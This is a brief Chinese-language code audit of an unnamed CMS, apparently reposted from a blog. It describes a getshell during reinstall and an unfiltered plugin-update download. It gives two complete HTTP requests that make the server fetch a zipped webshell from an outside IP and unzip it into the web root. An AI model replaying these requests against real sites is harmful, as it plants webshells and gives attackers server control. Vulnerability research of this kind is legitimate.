对某CMS的审计

0x01：重装getshell
如图：

230行直接把$config写入到了Conf/config.php

0x02：远程文件写入
～/htdocs/A/c/PluginsController.php
第403行中$filepath可控，只是加了一个ZIP，在特定环境下这里是可以阶段的。

往下跟

touch了tmp_path然后直接写入427行remote_url，再追踪看看这个remote_url

来源于401行的download_url且无任何过滤，前台看一下对应功能点。

在下面的代码中找到解压函数：

非常常规的解压函数，那么....很简单噻，直接压缩一个马，让他解压就是了。
尝试一下：

POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.253:8888
Content-Length: 86
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.253:8888
Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close

action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip

POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.253:8888
Content-Length: 32
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.253:8888
Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close

action=file-upzip&filepath=shell

shell路径：web/A/exts/shell/1.txt

对某CMS的审计

原文：https://www.cnblogs.com/nul1/p/12574965.html